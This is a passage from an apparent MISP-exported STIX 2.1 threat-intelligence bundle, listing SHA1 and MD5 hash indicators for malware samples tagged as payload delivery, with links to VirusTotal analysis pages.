"id": "url--58db81bf-43b8-47fe-b8ef-44b702de0b81",
|
|
"value": "https://www.virustotal.com/file/32b7a4f26eb3e2f44eeb82b95f9971572aeb82f1e218bbad39b2a8238d1448bd/analysis/1424398326/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81c0-f7d0-4d53-951f-465d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:28.000Z",
|
|
"modified": "2017-03-29T09:43:28.000Z",
|
|
"description": "sample - Xchecked via VT: eb1f746dbdc2598757423e4505ff898b8308282e638f9b940d84870e7a196fba",
|
|
"pattern": "[file:hashes.SHA1 = 'def57646439e1bbb0821bf1decf57c0f4daab69d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81c1-f93c-43a0-a02a-472d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:29.000Z",
|
|
"modified": "2017-03-29T09:43:29.000Z",
|
|
"description": "sample - Xchecked via VT: eb1f746dbdc2598757423e4505ff898b8308282e638f9b940d84870e7a196fba",
|
|
"pattern": "[file:hashes.MD5 = '4e82506e3db50fea390094863e90306c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81c2-780c-4b58-be5c-435102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:30.000Z",
|
|
"modified": "2017-03-29T09:43:30.000Z",
|
|
"first_observed": "2017-03-29T09:43:30Z",
|
|
"last_observed": "2017-03-29T09:43:30Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81c2-780c-4b58-be5c-435102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81c2-780c-4b58-be5c-435102de0b81",
|
|
"value": "https://www.virustotal.com/file/eb1f746dbdc2598757423e4505ff898b8308282e638f9b940d84870e7a196fba/analysis/1424817657/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81c3-ef78-41e7-8e4f-482d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:31.000Z",
|
|
"modified": "2017-03-29T09:43:31.000Z",
|
|
"description": "sample - Xchecked via VT: 9dd9befeefdc13ae72bf90952892eb357bdff72083c282fb73dd3821afe43e72",
|
|
"pattern": "[file:hashes.SHA1 = 'e12b46e1cafe1300067bffb273f45eea928bc756']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81c4-a7bc-4654-ac4b-4b7102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:32.000Z",
|
|
"modified": "2017-03-29T09:43:32.000Z",
|
|
"description": "sample - Xchecked via VT: 9dd9befeefdc13ae72bf90952892eb357bdff72083c282fb73dd3821afe43e72",
|
|
"pattern": "[file:hashes.MD5 = 'c57ddfde74e07574e458b107891c8fe8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81c5-5314-4d5a-8452-4afa02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:33.000Z",
|
|
"modified": "2017-03-29T09:43:33.000Z",
|
|
"first_observed": "2017-03-29T09:43:33Z",
|
|
"last_observed": "2017-03-29T09:43:33Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81c5-5314-4d5a-8452-4afa02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81c5-5314-4d5a-8452-4afa02de0b81",
|
|
"value": "https://www.virustotal.com/file/9dd9befeefdc13ae72bf90952892eb357bdff72083c282fb73dd3821afe43e72/analysis/1426058749/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81c6-071c-4e63-a55e-403302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:34.000Z",
|
|
"modified": "2017-03-29T09:43:34.000Z",
|
|
"description": "sample - Xchecked via VT: d3f4e3459bbe753ea8c022eef425d5b098b0f32c0e4cc4f390442d9796ed4ee2",
|
|
"pattern": "[file:hashes.SHA1 = '0d5d964eefdc36469ec11d0677a14ba13cb3c4ad']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81c7-cc1c-4afa-a386-485802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:35.000Z",
|
|
"modified": "2017-03-29T09:43:35.000Z",
|
|
"description": "sample - Xchecked via VT: d3f4e3459bbe753ea8c022eef425d5b098b0f32c0e4cc4f390442d9796ed4ee2",
|
|
"pattern": "[file:hashes.MD5 = '0493fdd94cf00686a74d4fe4a10ffdb4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81c8-3ff0-44b7-a007-484902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:36.000Z",
|
|
"modified": "2017-03-29T09:43:36.000Z",
|
|
"first_observed": "2017-03-29T09:43:36Z",
|
|
"last_observed": "2017-03-29T09:43:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81c8-3ff0-44b7-a007-484902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81c8-3ff0-44b7-a007-484902de0b81",
|
|
"value": "https://www.virustotal.com/file/d3f4e3459bbe753ea8c022eef425d5b098b0f32c0e4cc4f390442d9796ed4ee2/analysis/1431830208/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81c9-23a4-4e6d-b6fc-4ea802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:37.000Z",
|
|
"modified": "2017-03-29T09:43:37.000Z",
|
|
"description": "sample - Xchecked via VT: 6069b42bfdf59ce5ec95f068e871ee266fa7593457eb4b38dda113014be87ce6",
|
|
"pattern": "[file:hashes.SHA1 = '9e3c37a27c4b00ef018cfa4a5602577b1c16f245']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ca-2b74-4388-832b-414f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:38.000Z",
|
|
"modified": "2017-03-29T09:43:38.000Z",
|
|
"description": "sample - Xchecked via VT: 6069b42bfdf59ce5ec95f068e871ee266fa7593457eb4b38dda113014be87ce6",
|
|
"pattern": "[file:hashes.MD5 = '5b7c451dfab318d204d45bd8b7c73099']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81cb-11f8-41e7-ac71-4bf002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:39.000Z",
|
|
"modified": "2017-03-29T09:43:39.000Z",
|
|
"first_observed": "2017-03-29T09:43:39Z",
|
|
"last_observed": "2017-03-29T09:43:39Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81cb-11f8-41e7-ac71-4bf002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81cb-11f8-41e7-ac71-4bf002de0b81",
|
|
"value": "https://www.virustotal.com/file/6069b42bfdf59ce5ec95f068e871ee266fa7593457eb4b38dda113014be87ce6/analysis/1434426998/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81cc-2164-44a3-9a11-4aee02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:40.000Z",
|
|
"modified": "2017-03-29T09:43:40.000Z",
|
|
"description": "sample - Xchecked via VT: 941007ae7918e8eb1845598053cf7fc4b0c17d708c2dbd1d1b13d2dc12b138e1",
|
|
"pattern": "[file:hashes.SHA1 = 'dbb7ab514871aeda3caaf1c9f838e2ffa34d56f7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81cd-9fec-48fa-9403-400802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:41.000Z",
|
|
"modified": "2017-03-29T09:43:41.000Z",
|
|
"description": "sample - Xchecked via VT: 941007ae7918e8eb1845598053cf7fc4b0c17d708c2dbd1d1b13d2dc12b138e1",
|
|
"pattern": "[file:hashes.MD5 = '3feade9ea736754de621b9df3068580f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81ce-7908-4d25-a495-48b102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:42.000Z",
|
|
"modified": "2017-03-29T09:43:42.000Z",
|
|
"first_observed": "2017-03-29T09:43:42Z",
|
|
"last_observed": "2017-03-29T09:43:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81ce-7908-4d25-a495-48b102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81ce-7908-4d25-a495-48b102de0b81",
|
|
"value": "https://www.virustotal.com/file/941007ae7918e8eb1845598053cf7fc4b0c17d708c2dbd1d1b13d2dc12b138e1/analysis/1434414794/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81cf-814c-4f07-a5d0-494502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:43.000Z",
|
|
"modified": "2017-03-29T09:43:43.000Z",
|
|
"description": "sample - Xchecked via VT: f9b85d337aeba34d23cbe1340f596cc908f572cbeeb5fed4fb389d779c7d5004",
|
|
"pattern": "[file:hashes.SHA1 = '351eaa19f6116124153605fa9dda969ae839b89f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81d0-8264-4403-818c-4f5e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:44.000Z",
|
|
"modified": "2017-03-29T09:43:44.000Z",
|
|
"description": "sample - Xchecked via VT: f9b85d337aeba34d23cbe1340f596cc908f572cbeeb5fed4fb389d779c7d5004",
|
|
"pattern": "[file:hashes.MD5 = '9bb94ca3fd2f5db3b498e33828e143fc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81d1-224c-4822-b77a-4bcb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:45.000Z",
|
|
"modified": "2017-03-29T09:43:45.000Z",
|
|
"first_observed": "2017-03-29T09:43:45Z",
|
|
"last_observed": "2017-03-29T09:43:45Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81d1-224c-4822-b77a-4bcb02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81d1-224c-4822-b77a-4bcb02de0b81",
|
|
"value": "https://www.virustotal.com/file/f9b85d337aeba34d23cbe1340f596cc908f572cbeeb5fed4fb389d779c7d5004/analysis/1434165910/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81d2-25ec-430b-9ca9-4f3202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:46.000Z",
|
|
"modified": "2017-03-29T09:43:46.000Z",
|
|
"description": "sample - Xchecked via VT: 375005db3906b1aad931c0207932ccdc99a191e9ceb100ae364ee1f2ca15682d",
|
|
"pattern": "[file:hashes.SHA1 = '79612787544b30800234fb6644e30b01da3e3c4d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81d3-98a4-431e-935f-410202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:47.000Z",
|
|
"modified": "2017-03-29T09:43:47.000Z",
|
|
"description": "sample - Xchecked via VT: 375005db3906b1aad931c0207932ccdc99a191e9ceb100ae364ee1f2ca15682d",
|
|
"pattern": "[file:hashes.MD5 = '8b87248a9149d3de3b4fed4251b62edb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81d4-8940-4e92-89a5-49c702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:48.000Z",
|
|
"modified": "2017-03-29T09:43:48.000Z",
|
|
"first_observed": "2017-03-29T09:43:48Z",
|
|
"last_observed": "2017-03-29T09:43:48Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81d4-8940-4e92-89a5-49c702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81d4-8940-4e92-89a5-49c702de0b81",
|
|
"value": "https://www.virustotal.com/file/375005db3906b1aad931c0207932ccdc99a191e9ceb100ae364ee1f2ca15682d/analysis/1433552115/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81d5-7ef8-46f6-b7b4-49b502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:49.000Z",
|
|
"modified": "2017-03-29T09:43:49.000Z",
|
|
"description": "sample - Xchecked via VT: cc05d4bffba7464194bf25ef5f8dfe9541048404b29e31fa93392663b1873501",
|
|
"pattern": "[file:hashes.SHA1 = 'eb1d9a6216ea85996792844baa10cb16a0752d76']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81d6-7f00-4e6c-a963-473b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:50.000Z",
|
|
"modified": "2017-03-29T09:43:50.000Z",
|
|
"description": "sample - Xchecked via VT: cc05d4bffba7464194bf25ef5f8dfe9541048404b29e31fa93392663b1873501",
|
|
"pattern": "[file:hashes.MD5 = 'd77c1f07f633e39c160ccdaa7d70a99b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81d7-520c-4854-bb16-428802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:51.000Z",
|
|
"modified": "2017-03-29T09:43:51.000Z",
|
|
"first_observed": "2017-03-29T09:43:51Z",
|
|
"last_observed": "2017-03-29T09:43:51Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81d7-520c-4854-bb16-428802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81d7-520c-4854-bb16-428802de0b81",
|
|
"value": "https://www.virustotal.com/file/cc05d4bffba7464194bf25ef5f8dfe9541048404b29e31fa93392663b1873501/analysis/1478579292/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81d8-a9e8-4b25-9535-4a0602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:52.000Z",
|
|
"modified": "2017-03-29T09:43:52.000Z",
|
|
"description": "sample - Xchecked via VT: c693c3983f3c6e2e20d338ba240ff7411121a674b267ff86914156f9a91d5be4",
|
|
"pattern": "[file:hashes.SHA1 = 'd2d08a3e002fb066bbb68bde592248555dfef5d8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81d9-00d8-435b-bfaa-45cc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:53.000Z",
|
|
"modified": "2017-03-29T09:43:53.000Z",
|
|
"description": "sample - Xchecked via VT: c693c3983f3c6e2e20d338ba240ff7411121a674b267ff86914156f9a91d5be4",
|
|
"pattern": "[file:hashes.MD5 = '1610eca435d0a1b28850e1c56622a74e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81da-bb48-4a20-8f61-495a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:54.000Z",
|
|
"modified": "2017-03-29T09:43:54.000Z",
|
|
"first_observed": "2017-03-29T09:43:54Z",
|
|
"last_observed": "2017-03-29T09:43:54Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81da-bb48-4a20-8f61-495a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81da-bb48-4a20-8f61-495a02de0b81",
|
|
"value": "https://www.virustotal.com/file/c693c3983f3c6e2e20d338ba240ff7411121a674b267ff86914156f9a91d5be4/analysis/1475832637/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81db-cb6c-492e-aba3-4d3f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:55.000Z",
|
|
"modified": "2017-03-29T09:43:55.000Z",
|
|
"description": "sample - Xchecked via VT: 8ab4e92cd37cda1273f2359ec8d2c4b9cc4cf02faa199f8fe71f4f200a3ab31d",
|
|
"pattern": "[file:hashes.SHA1 = '4b7820d121045eeb7801dd65c25edfd0879b5ddd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81dc-2f7c-4aea-a0ec-44a402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:56.000Z",
|
|
"modified": "2017-03-29T09:43:56.000Z",
|
|
"description": "sample - Xchecked via VT: 8ab4e92cd37cda1273f2359ec8d2c4b9cc4cf02faa199f8fe71f4f200a3ab31d",
|
|
"pattern": "[file:hashes.MD5 = '4d4fcd1cfe45d12bce0bd97d495d5668']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:56Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81dd-9030-4638-8e58-4fe502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:57.000Z",
|
|
"modified": "2017-03-29T09:43:57.000Z",
|
|
"first_observed": "2017-03-29T09:43:57Z",
|
|
"last_observed": "2017-03-29T09:43:57Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81dd-9030-4638-8e58-4fe502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
